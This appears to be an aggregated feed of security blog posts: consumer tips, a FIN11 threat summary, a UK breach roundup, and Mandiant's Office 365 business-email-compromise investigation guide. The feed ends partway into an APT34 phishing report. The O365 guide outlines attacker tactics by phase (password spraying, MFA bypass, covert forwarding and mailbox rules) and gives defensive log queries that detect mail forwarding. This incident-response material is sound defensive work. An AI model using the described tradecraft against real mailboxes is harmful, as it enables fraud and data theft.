    A malware misfortune isn’t the only thing that users should beware of this Halloween. Cybercriminals have also managed to inject malicious code into a wireless provider’s web platform, casting an evil spell to steal users’ credit card data. The witches and warlocks allegedly responsible for casting this evil spell are part of a Magecart spin-off group that’s known for its phishing prowess.  To pull off this attack, they plated a credit card skimmer onto the wireless provider’s checkout page. This allowed the hackers to exfiltrate users’ credit card data whenever they made a purchase – a spell that’s difficult to break.

    Why These Cyberspooks Are Emerging

    While these threats might seem like just another Halloween trick, there are other forces at play. According to McAfee’s Quarterly Threats Report from July 2020, threats like malware phishing and trojans have proven opportunistic for cybercriminals as users spend more and more time online – whether it be working from home, distance learning, or connecting with friends and loved ones. In fact, McAfee Labs observed 375 threats per minute in Q1 2020 alone.

    So, as hackers continue to adapt their techniques to take advantage of users spending more time online, it’s important that people educate themselves on emerging threats so they can take necessary precautions and live their digital lives free from worry.

    How to Stay Protected

    Fortunately, there are a number of steps you can take to prevent these threats from haunting your digital life. Follow these tips to keep cybersecurity tricks at bay this spooky season:

    Beware of emails from unknown senders

    Zombie malware is easily spread by phishing, which is when scammers try to trick you out of your private information or money. If you receive an email from an unknown user, it’s best to proceed with caution. Don’t click on any links or open any attachments in the email and delete the message altogether.

    Review your accounts

    Look over your credit card accounts and bank statements often to check whether someone is fraudulently using your financial data – you can even sign up for transaction alerts that your bank or credit card company may provide. If you see any charges that you did not make, report it to the authorities immediately.

    Use a comprehensive security solution

    Add an extra layer of protection with a security solution like McAfee® Total Protection to help safeguard your digital life from malware and other threats. McAfee Total Protection also includes McAfee® WebAdvisor – web protection that enables users to sidestep attacks before they happen with clear warnings of risky websites, links, and files.

    Stay updated

    To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


    The post Trick or Treat: Avoid These Spooky Threats This Halloween appeared first on McAfee Blogs.

    FIN11: Widespread Email Campaigns as Precursor for Ransomware and Data Theft

    Mandiant Threat Intelligence recently promoted a threat cluster to a named FIN (or financially motivated) threat group for the first time since 2017. We have detailed FIN11's various tactics, techniques and procedures in a report that is available now by signing up for Mandiant Advantage Free.

    In some ways, FIN11 is reminiscent of APT1; they are notable not for their sophistication, but for their sheer volume of activity. There are significant gaps in FIN11’s phishing operations, but when active, the group conducts up to five high-volume campaigns a week. While many financially motivated threat groups are short lived, FIN11 has been conducting these widespread phishing campaigns since at least 2016. From 2017 through 2018, the threat group primarily targeted organizations in the financial, retail, and hospitality sectors. However, in 2019 FIN11’s targeting expanded to include a diverse set of sectors and geographic regions. At this point, it would be difficult to name a client that FIN11 hasn’t targeted.

    Mandiant has also responded to numerous FIN11 intrusions, but we’ve only observed the group successfully monetize access in few instances. This could suggest that the actors cast a wide net during their phishing operations, then choose which victims to further exploit based on characteristics such as sector, geolocation or perceived security posture. Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands. The group’s shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—is part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion.

    Notably, FIN11 includes a subset of the activity security researchers call TA505, but we do not attribute TA505’s early operations to FIN11 and caution against using the names interchangeably. Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors’ use of criminal service providers. Like most financially motivated actors, FIN11 doesn’t operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware. Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.

    To learn more about FIN11’s evolving delivery tactics, use of services, post-compromise TTPs, and monetization methods, register for Mandiant Advantage Free. The full FIN11 report is also available through our FireEye Intelligence Portal (FIP). Then for even more information, register for our exclusive webinar on Oct. 29 where Mandiant threat intelligence experts will take a deeper dive into FIN11, including its origins, tactics, and potential for future activity. 

    Cyber Security Roundup for September 2020

    A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, August 2020.

    Taking security training courses and passing certification exams are common ingredients in the makeup of the vast majority of accomplished cybersecurity and information security professionals. As such, two security incidents last month raised more than just a surprising eyebrow or two within the UK security industry. 

    The first involved the renown and well respected United States security training company, The SANS Institue, announcing that a successful email phishing attack against one of its employees resulted in 28,000 personal records being stolenSANS classified this compromise as "consent phishing", namely where an employee is tricked into providing malicious Microsoft Office 365 OAuth applications access to their O365 accounts. In June 2020, Microsoft warned 'consent phishing' scams were targeting remote workers and their cloud services.

    The second incident involved British cybersecurity firm NCC Group, after The Register reported NCC marked CREST penetration testing certification exam 'cheat cheats' were posted on Github. El Reg stated the leaked NCC marked document "offered step-by-step guides and walkthroughs of information about the Crest exams.  With those who posted the documents claiming that the documents contained a clone of the Crest CRT exam app that helped users to pass the CRT exam in the first attempt. CREST, a globally recognised provider of penetration testing accreditations, conducted their own investigation into the Github post and then suspended their Certified Infrastructure Tester (CCF Inf) and Certified Web Application Tester (CCT App) exams.

    Reuters reported British trade minister Liam Fox email account was compromised by Russian hackers through a spear-phishing attack. This led to leaks of sensitive US-UK  trade documents in a disinformation campaign designed to influence the outcome of the UK general election in late 2019.

    UK foreign exchange firm Travelex is still revelling from the double 2020 whammy of major ransomware outbreak followed by the impact COVID-19, and has managed to stay in business thanks a bailout arranged by their business administrators PWC. 

    Uber's former Cheif Security Officer has been charged with obstruction of justice in the United States, accused of covering up a massive 57 million record data breach in 2016. Uber eventually admitted paying a hacking group $100,000 (£75,000) ransom to delete the data they had stolen.

    The British Dental Association advised its dentist members that their bank account details and correspondence with them were stolen by hackers.  A BDA spokeswoman told BBC News it was possible that information about patients was also exposed, but remained vague about the potential context. The cyber breach was likely caused by a hack of the BDA website given it was taken offline for a considerable amount of time after reporting the breach.

    Its seems that every month I report a huge cloud misconfiguration data beach, typically found by researchers looking for publicity, and caused by businesses not adequately securing their cloud services.  This month it was the turn of cosmetics giant Avon after researchers 'SafetyDetectives" found 19 million records were accessible online due to the misconfiguration of a cloud server.  Accurics separately reported misconfigured cloud services accounted for 93% of 200 breaches it has seen in the past two years, exposing more than 30 billion records. Also predicting cloud services data breaches are likely to increase in both velocity and scale, I am inclined to agree.
    Crime Dot Com: From Viruses to Vote Rigging, How Hacking Went Global
    Finally, I was invited to review a pre-release of Geoff White’s new book, Crime Dot Com: From Viruses to Vote Rigging, How Hacking Went Global”. I posted a book review upon its release in August, I thoroughly recommend it. The book is superbly researched and written, the author’s storytelling investigative journalist style not only lifts the lid on the murky underground world of cybercrime but shines a light on the ingenuity, persistence and ever-increasing global scale of sophisticated cybercriminal enterprises. While this book is an easily digestible read for non-cyber security experts, the book provides cybersecurity professionals working on the frontline in defending organisations and citizens against cyber-attacks, with valuable insights and lessons to be learnt about their cyber adversaries and their techniques, particularly in understanding the motivations behind today's common cyberattacks.

    Stay safe and secure.


    Securing the COVID-19 ‘New Normal’ of Homeworking

    The COVID-19 pandemic has put into motion a scale of remote working never before seen. Our teams are no longer just grouped in different office locations – but working individually from kitchen tables, spare rooms and, for the lucky ones, home offices! It’s therefore inevitable that this level of remote working will reveal security pitfalls for remediation, with improvements that can be carried forward when this period is over.
    Attackers are taking advantage of heightened anxiety and homeworking
    Tony Pepper, CEO at Egress, provides his insight below, as well as his six tips to improve data security while working from home.


    It’s sad, but it’s no surprise that phishing attacks have increased due to COVID-19– and businesses need to be prepared. Attackers are taking advantage of an environment of heightened anxiety and disrupted work settings to trick people into making mistakes, and they’re unlikely to stop until at least the main wave of the pandemic has passed.

    Research shows that phishing is a major security issue under normal circumstances. Egress’ recent Insider Data Breach survey found that 41% of employees who had accidentally leaked data had done so because of a phishing email. More worryingly due to their level of access to data and systems, senior personnel are typically the most likely group to fall victim to phishing attacks, with 61% of directors saying that they’d caused a breach in this way.

    And education and training can only go so far. Of course, we must continue to encourage employees to be vigilant to suspicious emails and to do things like hovering over links before clicking on them. We also need to reduce blame culture and free up employees to report genuine mistakes without fear.

    But this can only go so far. People will always make mistakes. The good news is that advanced technology like contextual machine learning can remediate the targeted attacks, like conversation hijacking, that usually do the most damage to businesses.

    Productivity and Security
    Even in our tech-savvy world, there are still organisations that don’t have VPN access set up or enough laptops, mobile devices or processes to enable home working. But while IT teams try to quickly sort this situation out, we’re seeing employees finding workarounds, for example by sharing files using FTP sites or sending data to personal devices to work on.

    We talk a lot about ‘human layer security’ technologies, which find the right balance between productivity and security. Right now, as well as looking at technologies to help securely move meetings, events and other activities online, businesses should also check that usually easy routine tasks can still be carried out safely – such as sharing large files or sending sensitive data via email. In particular, technologies like contextual machine learning and AI can identify what typically ‘good’ security behaviour looks like for individual users and then prevent abnormal behaviours that put data at risk.

    For example, with people working on smaller screens and via mobile devices, it’s more likely they might attach the wrong document to an email or include a wrong recipient. Contextual machine learning can spot when incidents like this are about to happen and correct the user’s behaviour to prevent a breach before it happens.

    Human Error
    People are the new perimeter when it comes to data security – their decisions and behaviours can put data at risk every day, especially at a time of global heightened anxiety.

    We know from our 2020 Insider Data Breach Survey that over half of employees don’t think their organisation has sole ownership over company data – instead believing that it is in-part or entirely owned by the individuals and teams who created it. And we also know that people are more likely to take risks with data they feel belongs to them than data they believe belongs to someone else. When they don’t have access to the right tools and technology to work securely – or they think the tools they do have will slow them down, especially at a time when the need for productivity is at its highest – they’re more likely to cut corners.

    Maintaining good security practices is essential – and the good news is there are technologies on the market that can help ensure the right level of security is applied to sensitive data without blocking productivity.

    Six Tips to improve Data Security while Working from Home 
    We can all agree that times are incredibly tough right now. For security professionals looking to mitigate some of the risks, here are six practical tips are taken from the conversations we’re having with other organisations right now:

    1. Look for security software that doesn’t hamper productivity. It’s generally the aim of the game anyway – but right now, employees are feeling increased pressure to prove their productivity. If you’re finding yourself selecting new solutions, it’s never been more crucial to select technologies that don’t add difficult extra steps for them or anyone they’re working with outside the organisation.
    2. Choose collaboration/productivity solutions that have security baked into them. The other side to the coin of the point above, really: when choosing any new solution to implement at this time, make sure that security measures are part of a product’s standard design, and not an after-thought.
    3. Automate security wherever possible. If it’s possible, take decisions out of end users’ hands to ensure the security of sensitive information in line with policy, reducing the risk of someone accidentally or intentionally not using security software.
    4. Engage employees over security best practices. Phishing is a good example of this. Some inbound risks will evade the filters on your network boundary and end up in users’ mailboxes. Effort to proactively engage employees through e-learning and other educational measures can help them to know what to do with emails they think are suspicious (for example, hovering over links before clicking on them).
    5. Look to AI and machine learning to help solve advanced risks. Use cases like conversation hijacking, misdirected emails or people attaching the wrong files to documents can now be mitigated by intelligent technology like contextual machine learning, which determines what “good security behaviour” looks like for each individual, and alerts them and administrators to abnormal incidents – effectively stopping breaches before they happen.
    6. Implement no-fault reporting. People often don’t report security incidents because they’re concerned about the repercussions. Where it’s appropriate to do so, implement no-fault reporting to encourage individuals to report incidents in a timely manner, so you can focus on remediating the problem as quickly as possible.

      Obscured by Clouds: Insights into Office 365 Attacks and How Mandiant Managed Defense Investigates

      With Business Email Compromises (BECs) showing no signs of slowing down, it is becoming increasingly important for security analysts to understand Office 365 (O365) breaches and how to properly investigate them. This blog post is for those who have yet to dip their toes into the waters of an O365 BEC, providing a crash course on Microsoft’s cloud productivity suite and its assortment of logs and data sources useful to investigators. We’ll also go over common attacker tactics we’ve observed while responding to BECs and provide insight into how Mandiant Managed Defense analysts approach these investigations at our customers using PowerShell and the FireEye Helix platform.

      Office 365

      Office 365 is Microsoft’s cloud-based subscription service for the Microsoft Office suite. It is built from dozens of applications tightly embedded into the lives of today’s workforce, including:

      • Exchange Online, for emails
      • SharePoint, for intranet portals and document sharing
      • Teams and Skype for Business, for instant messaging
      • OneDrive, for file sharing
      • Microsoft Stream, for recorded meetings and presentations

      As more and more organizations decide to adopt Microsoft’s cloud-based offering to meet their needs, unauthorized access to these O365 environments, or tenants in Microsoft’s parlance, has become increasingly lucrative to motivated attackers. The current high adoption rate of O365 means that attackers are getting plenty of hands on experience with using and abusing the platform. While many tactics have remained largely unchanged in the years since we’ve first observed them, we’ve also witnessed the evolution of techniques that are effective against even security-conscious users.

      In general, the O365 compromises we’ve responded to have fallen into two categories:

      • Business Email Compromises (BECs)
      • APT or state-sponsored intrusions

      Based on our experience, BECs are a common threat to any organization's O365 tenant. The term “BEC” typically refers to a type of fraud committed by financially motivated attackers. BEC actors heavily rely on social engineering to carry out their schemes, ultimately defrauding organizations and even personnel.

      One common BEC scheme involves compromising a C-suite executive’s account via phishing. Once the victim unwittingly enters their credentials into a web form masquerading as the legitimate Office 365 login portal, attackers log in and instruct others in the organization to conduct a wire transfer, perhaps under the guise of an upcoming acquisition that has yet to be publicly announced. However, we’ve also observed more effective schemes where attackers compromise those in financial positions and patiently wait until an email correspondence has begun about a due payment. Attackers seize this opportunity by sending a doctored invoice (sometimes based on a legitimate invoice that had been stolen earlier) on behalf of the compromised user to another victim responsible for making payments. These emails are typically hidden from the compromised user due to attacker-created Outlook mailbox rules. Often times, by the time the scheme is inevitably discovered and understood days or weeks later, the money is unrecoverable—highlighting the importance of contacting law enforcement immediately if you’ve fallen victim to a fraud.

      The personal finances of staff aren’t off limits to attackers either. We’ve observed several cases of W-2 scams, in which attackers send a request to HR for W-2 information from the victim’s account. Once obtained, this personally identifiable information is later used to conduct tax fraud.

      Conversely, APT intrusions are typically more sophisticated and are conducted by state-sponsored threat actors. Rather than for financial gain, APT actors are usually tasked to compromise O365 tenants for purposes of espionage, data theft, or destruction. Given the wealth of sensitive information housed in any given organization’s O365 tenant, APT actors may not even need to touch a single endpoint to complete their mission, sidestepping the many security controls organizations have implemented and invested in.

      O365 Logs and Data Sources

      In this section, we’ll touch on the multitude of logs and portals containing forensic data relevant to an O365 investigation.

      Before we can begin investigating an O365 case, we’ll work with our clients to get an “Investigator” account provisioned with the roles required to obtain the forensic data we need. For the purposes of this blog post, we’ll quickly list the roles needed for an Investigator account, but during an active Managed Defense investigation, a designated Managed Defense consultant will provide further guidance on account provisioning.

      At a minimum, the Investigator account should have the following roles:

      Exchange Admin Roles

      • View-only audit logs
      • View-only configuration
      • View-only recipients
      • Mailbox Search
      • Message Tracking

      eDiscovery Rights

      • eDiscovery Manager role

      Azure Active Directory Roles

      • Global Reader

      Unified Audit Log (UAL)

      The Unified Audit Log records activity from various applications within the Office 365 suite, and can be considered O365’s main log source. Entries in the UAL are stored in JSON format. We recommend using the PowerShell cmdlet Search-UnifiedAuditLog to query the UAL as it allows for greater flexibility, though it can also be acquired from the Office 365 Security & Compliance Center located at In order to leverage this log source (and the Admin Audit Log), ensure that the Audit Log Search feature is enabled.

      The UAL has a few nuances that are important to consider. While it provides a good high-level summary of activity across various O365 applications, it won’t log comprehensive mailbox activity (for that, acquire the Mailbox Audit Log). Furthermore, the UAL has a few limitations, namely:

      • Results to a single query are limited to 5000 results
      • Only 90 days of activity are retained
      • Events may take up to 24 hours before they are searchable

      Mailbox Audit Log (MAL)

      The Mailbox Audit Log, part of Exchange Online, will capture additional actions performed against objects within a mailbox. As such, it’s a good idea acquire and analyze the MAL for each affected user account with the PowerShell cmdlet Search-MailboxAuditLog. Note that entries in the MAL will be retained for 90 days (by default) and timestamps will be based on the user’s local time zone. The MAL’s retention time can always be increased with the PowerShell cmdlet Set-Mailbox along with the AuditLogAgeLimit parameter.

      At the time of writing this post, Microsoft has recently released information about enhanced auditing functionality that gives investigators insight into which emails were accessed by attackers. This level of logging for regular user accounts is only available for organizations with an Office 365 E5 subscription. Once Advanced Auditing is enabled, mail access activity will be logged under the MailItemsAccessed operation in both the UAL and MAL.

      Administrator Audit Log

      If the Audit Log Search feature is enabled, this supplemental data source logs all PowerShell administrative cmdlets (including command-line arguments) executed by administrators. If you suspect that an administrator account was compromised, don’t overlook this log! The PowerShell cmdlet Search-AdminAuditLog is used to query these logs, but note that the Audit Log Search feature must be enabled and the same 90 day retention limit will be in place.

      Azure AD Logs

      Azure AD logs can be accessed from the Azure portal ( under the Azure Active Directory service. Azure AD Sign-in logs contain detailed information about how authentications occur and O365 application usage. Azure AD audit logs are also a valuable source of information, containing records of password resets, account creations, role modifications, OAuth grants, and more that could be indicative of suspicious activity. Note that Azure AD logs are only available for 30 days.

      Cloud App Security Portal

      For cases where OAuth abuse has been observed, information about cloud applications can be found in Microsoft’s Cloud App Security portal ( Access to this portal requires an E5 license or a standalone Cloud App license. For more background on OAuth abuse, be sure to check out our blog post:  Shining a Light on OAuth Abuse with PwnAuth.

      Message Traces

      Message traces record the emails sent and received by a user. During an investigation, run reports on any email addresses of interest. The message trace report will contain detailed mail flow information as well as subject lines, original client IP addresses, and message sizes. Message traces are useful for identifying emails sent by attackers from compromised accounts, and can also aid in identifying initial phishing emails if phishing was used for initial access. To obtain the actual emails, use the Content Search tool.

      Only the past 10 days of activity is available with the Get-MessageTrace PowerShell cmdlet. Historical searches for older messages can be run with the Get-HistoricalSearch cmdlet (up to 90 days by default), but historical searches typically take hours for the report to be available. Historical reports can also be generated within the Security and Compliance Center.

      eDiscovery Content Searches

      The Content Search tool allows investigators to query for emails, documents, and instant message conversations stored in an Office 365 tenant. We frequently run Content Search queries to find and acquire copies of emails sent by attackers. Content searches are limited to what has been indexed by Microsoft, so recent activity may not immediately appear. Additionally, only the most recent 1000 items will be shown in the preview pane.

      Anatomy of an O365 BEC

      As mentioned earlier, BECs are one of the more prevalent threats to O365 tenants seen by Managed Defense today. Sometimes, Mandiant analysts respond to several BEC cases at our customers within the same week. With this frontline experience, we’ve compiled a list of commonly observed tactics and techniques to advise our readers about the types of activities one should anticipate. Please note that this is by no means a comprehensive list of O365 attacks, rather a focus on the usual routes we’ve seen BEC actors take to accomplish their objective.

      Phase 1: Initial Compromise

      • Phishing: Emails with links to credential harvesting forms sent to victims, sometimes from the account of a compromised business partner.
      • Brute force: A large dictionary of passwords attempted against an account of interest.
      • Password spray: A dictionary of commonly used passwords attempted against a list of known user accounts.
      • Access to credential dump: Valid credentials used from a previous compromise of the user.
      • MFA bypasses: Use of mail clients leveraging legacy authentication protocols (e.g. IMAP/POP), which bypass MFA policies. Attackers may also spam push notifications to the victim by repeatedly attempting to log in, eventually leading to the victim mistakenly accepting the prompt.

      Phase 2: Establish Foothold

      • More phishing: Additional phishing lures sent to internal/external contacts from Outlook’s global address list.
      • More credible lures: New phishing lures uploaded to the compromised user's OneDrive or SharePoint account and shared with the victim’s coworkers.
      • SMTP forwarding: SMTP forwarding enabled in the victim’s mailbox to forward all email to an external address.
      • Forwarding mailbox rules: Mailbox rules created to forward all or certain mail to an external address.
      • Mail client usage: Outlook or third-party mail clients used by attackers. Mail will continue to sync for a short while after a password reset occurs.

      Phase 3: Evasion

      • Evasive mailbox rules: Mailbox rules created to delete mail or move some or all incoming mail to uncommonly used folders in Outlook, such as “RSS Subscriptions”.
      • Manual evasion: Manual deletion of incoming and sent mail. Attackers may forego mailbox rules entirely.
      • Mail forwarding: Attackers accessing emails without logging in if a mechanism to forward mail to an external address was set up earlier.
      • Mail client usage: Outlook or third-party mail clients used by attackers. Mail can be synced locally to the attacker’s machine and accessed later.
      • VPN usage: VPN servers, sometimes with similar geolocations to their victims, used in an attempt to avoid detection and evade conditional access policies.

      Phase 4: Internal Reconnaissance

      • Outlook searching: The victim’s mailbox queried by attackers for emails of interest. While not recorded in audit logs, it may be available to export if it was not deleted by attackers.
      • O365 searching: Searches conducted within SharePoint and other O365 applications for content of interest. While not recorded in audit logs, SharePoint and OneDrive file interactions are recorded in the UAL.
      • Mail client usage: Outlook or third-party mail clients used by attackers. Mail can be synced locally to the attacker’s machine and accessed later.

      Phase 5: Complete Mission

      • Direct deposit update: A request sent to the HR department to update the victim’s direct deposit information, redirecting payment to the BEC actor.
      • W-2 scam: A request sent to the HR department for W-2 forms, used to harvest PII for tax fraud.
      • Wire transfer: A wire transfer requested for an unpaid invoice, upcoming M&A, charities, etc.
      • Third-party account abuse: Abuse of the compromised user’s privileged access to third-party accounts and services, such as access to a corporate rewards site.

      How Managed Defense Responds to O365 BECs

      In this section, we’re going to walk through how Managed Defense investigates a typical O365 BEC case.

      Many of the steps in our investigation rely on querying for logs with PowerShell. To do this, first establish a remote PowerShell session to Exchange Online. The following Microsoft documentation provides guidance on two methods to do this:

      Broad Scoping

      We start our investigations off by running broad queries against the Unified Audit Log (UAL) for suspicious activity. We’ll review OAuth activity too, which is especially important if something more nefarious than a financially motivated BEC is suspected. Any FireEye gear available to us—such as FireEye Helix and Email Security—will be leveraged to augment the data available to us from Office 365. 

      The following are a few initial scoping queries we’d typically run at the beginning of a Managed Defense engagement.

      Scoping Recent Mailbox Rule Activity

      Even in large tenants, pulling back all recent mailbox rule activity doesn’t typically produce an unmanageable number of results, and attacker-created rules tend to stand out from the rest of the noise.

      Querying UAL for all mailbox rule activity in Helix:

      class=ms_office365 action:[New-InboxRule, Set-InboxRule, Enable-InboxRule] | table [createdtime, action, username, srcipv4, srcregion, parameters, rawmsg]

      Query UAL for new mail rule activity in PowerShell:

      Search-UnifiedAuditLog -StartDate (Get-Date).AddDays(-90) -EndDate (Get-Date) -ResultSize 5000 -Operations "New-InboxRule","Set-InboxRule","Enable-InboxRule" | Export-CSV \path\to\file.csv –NoTypeInformation -Encoding utf8

      Scoping SMTP Forwarding Activity

      SMTP forwarding is sometimes overlooked because it appears under a UAL operation separate from mailbox rules. This query looks for the Set-Mailbox operation containing a parameter to forward mail over SMTP, indicative of automatic forwarding being enabled from OWA.

      Querying UAL for SMTP forwarding in Helix:

      class=ms_office365 action=Set-Mailbox rawmsg:ForwardingSmtpAddress | table [createdtime, action, username, srcipv4, srcregion, parameters, rawmsg]

      Querying UAL for SMTP forwarding in PowerShell:

      Search-UnifiedAuditLog -StartDate (Get-Date).AddDays(-90) -EndDate (Get-Date) -ResultSize 5000 -FreeText "ForwardingSmtpAddress" | Export-CSV \path\to\file.csv –NoTypeInformation -Encoding utf8

      Analyze Compromised Users Logs

      After we’ve finished scoping the tenant, we’ll turn our attention to the individual users believed to be involved in the compromise. We’ll acquire all relevant O365 logs for the identified compromised user(s) - this includes the user's UAL, Mailbox Audit Log (MAL), and Admin audit log (if the user is an administrator). We’ll review these logs for anomalous account activity and assemble a list of attacker IP addresses and User-Agents strings. We’ll use this list to further scope the tenant.

      O365 investigations rely heavily on anomaly detection. Many times, the BEC actor may even be active at the same time as the user. In order to accurately differentiate between legitimate user activity and attacker activity within a compromised account, it's recommended to pull back as much data as possible to use as a reference for legitimate activity. Using the Helix query transforms groupby < [srccountry,srcregion], groupby < useragent and groupby < srcipv4 , which highlight the least common geolocations, User Agent strings, and IP addresses, can also assist in identifying anomalies in results.

      Querying UAL for a user in Helix:

      class=ms_office365 | table [createdtime, action, username, srcipv4, srccountry, srcregion, useragent, rawmsg] | groupby < [srccountry,srcregion]

      Querying UAL for a user in PowerShell:

      Search-UnifiedAuditLog -StartDate mm/dd/yyyy -EndDate (Get-Date) -ResultSize 5000 -UserIds | Export-CSV \path\to\file.csv –NoTypeInformation -Encoding utf8

      Querying MAL for a user in PowerShell:

      Search-MailboxAuditLog -Identity -LogonTypes Owner,Delegate,Admin -ShowDetails -StartDate (Get-Date).AddDays(-90) -EndDate (Get-Date) | Export-CSV \path\to\file.csv –NoTypeInformation -Encoding utf8

      Querying Admin Audit Log for all events within a certain date in PowerShell:

      Search-AdminAuditLog -StartDate mm/dd/yyyy -EndDate mm/dd/yyyy | Export-CSV \path\to\file.csv –NoTypeInformation -Encoding utf8

      Query UAL with New Leads

      Now that we’ve built a list of suspicious IP addresses (or even entire CIDR ranges) and User-Agent strings, we’ll run new queries against the entire UAL to try to identify other compromised user accounts. We’ll repeat this step and the previous step for each newly identified user account.

      One advantage to using FireEye Helix platform over PowerShell is that we can query entire CIDR ranges. This is helpful when we observe attackers coming from a VPN or ISP that dynamically assigns IP addresses within the same address block.

      Queries for attacker User-Agent strings usually generate more noise to sift through than IP address searches. In practice, User-Agent queries are only beneficial if the attackers are using an uncommon browser or version of a browser. Due to limitations of the Search-UnifiedAuditLog cmdlet, we’ve had the most success using the FreeText parameter and searching for simple strings.

      In Helix:

      class=ms_office365 (srcipv4:[,] OR useragent:Opera) | table [createdtime, action, username, srcipv4, srccountry, srcregion, useragent, rawmsg] | groupby username

      Querying the UAL for IPs and user agents in PowerShell:

      Search-UnifiedAuditLog -StartDate mm/dd/yyyy -EndDate (Get-Date) -ResultSize 5000 -IPAddresses, | Export-CSV \path\to\file.csv –NoTypeInformation -Encoding utf8
      Search-UnifiedAuditLog -StartDate mm/dd/yyyy -EndDate (Get-Date) -ResultSize 5000 -FreeText "Opera" | Export-CSV \path\to\file.csv –NoTypeInformation -Encoding utf8

      Analyze Message Traces

      We’ll use PowerShell to query message traces for the compromised users we’ve identified. If the email was sent within the past 10 days, use the Get-MessageTrace cmdlet, which immediately returns results and allows teams to query IP addresses. For older emails, use the Start-HistoricalSearch cmdlet and download the report later from the Mail Flow section of the Security & Compliance center.

      Querying for the last 10 days of mail sent by the victim in PowerShell:

      Get-MessageTrace -StartDate (Get-Date).AddDays(-10) -EndDate (Get-Date) -SenderAddress | Select-Object Received, SenderAddress, RecipientAddress, Subject, Status, FromIP, Size, MessageID | Export-CSV \path\to\file.csv –NoTypeInformation -Encoding utf8

      Querying for older emails (up to 90 days) in PowerShell:

      Start-HistoricalSearch -ReportTitle "Mandiant O365 investigation" -StartDate mm/dd/yyyy -EndDate mm/dd/yyyy -ReportType MessageTraceDetail -SenderAddress

      As Message Trace results are reviewed, attention should be given to IP addresses to determine which emails were sent by attackers. If phishing was the suspected initial compromise vector, it’s a good idea to also query for incoming mail received within a few days prior to the first compromise date and look for suspicious sender addresses and/or subject lines.

      Acquire Emails of Interest

      With our list of suspicious emails identified from message traces, we’ll use the Content Search tool available in the Office 365 Security and Compliance Center acquire the email body and learn what domains were used in phishing lures (if phishing was present). Content Searches are performed by using a straightforward GUI, and the results can either be previewed in the browser, downloaded individually as EML files, or downloaded in bulk as PST files.

      Final Scoping

      At this point of our investigation, the BEC should be sufficiently scoped within the tenant. To ensure any follow-on activity hasn’t occurred, we’ll take all of the attack indicators and perform our final queries across the UAL.

      With that said, there are still edge cases in which attacker activity wouldn’t appear in O365 logs. For example, perhaps an additional user has submitted their credentials to a phishing page, but the attackers haven’t used them to log in yet. To ensure we don’t miss this activity, we’ll perform additional scoping across available network logs, specifically for IP addresses and domains related to the attacker’s phishing infrastructure. We’ll also leverage other FireEye products, such as the Endpoint Security platform, to search for phishing domains present on a host’s web browser history.


      Unauthorized access to O365 tenant doesn’t just pose a threat to an organization, but also to its staff and business partners. Organizations without enhanced security controls in O365 are at the greatest risk of experiencing a BEC. However, as multi factor-authentication becomes more and more commonplace, we’ve witnessed an increase of MFA bypass attempts performed by increasingly proficient attackers.

      It’s important to remember that social engineering plays a primary role throughout a BEC. Ensure that users are trained on how to identify credential harvesting forms, a common compromise vector. When in the midst of a BEC compromise, teams may want to promptly alert personnel in HR and finance-related roles to exercise extra caution when processing requests related to banking or wire transfers while the investigation is in progress.

      The examples covered in this blog post are just a sample of what Managed Defense performs while investigating an Office 365 compromise. To take a proactive approach at preventing BECs, make sure the following best practices are implemented in a O365 tenant. Additionally, FireEye Email Security offers protections against phishing and the Helix platform’s O365 ruleset can alert on anomalous activity as soon as it happens.

      Recommended Best Practices

      • Ensure mailbox audit logging is enabled on all accounts
      • Disable Legacy Authentication protocols
      • Enable multi-factor authentication (MFA)
      • Enforce strong passwords and a password expiration policy
      • Forward O365 audit logs to a centralized logging platform for extended retention
      • Enforce an account lockout policy in Azure/on-premise Active Directory
      • Restrict mail forwarding to external domains


      Special thanks to Doug Bienstock, Glenn Edwards, Josh Madeley, and Tim Martin for their research and assistance on the topic.

      Hard Pass: Declining APT34’s Invite to Join Their Professional Network


      With increasing geopolitical tensions in the Middle East, we expect Iran to significantly increase the volume and scope of its cyber espionage campaigns. Iran has a critical need for strategic intelligence and is likely to fill this gap by conducting espionage against decision makers and key organizations that may have information that furthers Iran's economic and national security goals. The identification of new malware and the creation of additional infrastructure to enable such campaigns highlights the increased tempo of these operations in support of Iranian interests.

      FireEye Identifies Phishing Campaign

      In late June 2019, FireEye identified a phishing campaign conducted by APT34, an Iranian-nexus threat actor. Three key attributes caught our eye with this particular campaign:

      1. Masquerading as a member of Cambridge University to gain victims’ trust to open malicious documents,
      2. The usage of LinkedIn to deliver malicious documents,
      3. The addition of three new malware families to APT34’s arsenal.

      FireEye’s platform successfully thwarted this attempted intrusion, stopping a new malware variant dead in its tracks. Additionally, with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE), Intelligence, and Advanced Practices teams, we identified three new malware families and a reappearance of PICKPOCKET, malware exclusively observed in use by APT34. The new malware families, which we will examine later in this post, show APT34 relying on their PowerShell development capabilities, as well as trying their hand at Golang.

      APT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014. They use a mix of public and non-public tools to collect strategic information that would benefit nation-state interests pertaining to geopolitical and economic needs. APT34 aligns with elements of activity reported as OilRig and Greenbug, by various security researchers. This threat group has conducted broad targeting across a variety of industries operating in the Middle East; however, we believe APT34's strongest interest is gaining access to financial, energy, and government entities.

      Additional research on APT34 can be found in this FireEye blog post, this CERT-OPMD post, and this Cisco post.

      Mandiant Managed Defense also initiated a Community Protection Event (CPE) titled “Geopolitical Spotlight: Iran.” This CPE was created to ensure our customers are updated with new discoveries, activity and detection efforts related to this campaign, along with other recent activity from Iranian-nexus threat actors to include APT33, which is mentioned in this updated FireEye blog post.

      Industries Targeted

      The activities observed by Managed Defense, and described in this post, were primarily targeting the following industries:

      • Energy and Utilities
      • Government
      • Oil and Gas

      Utilizing Cambridge University to Establish Trust

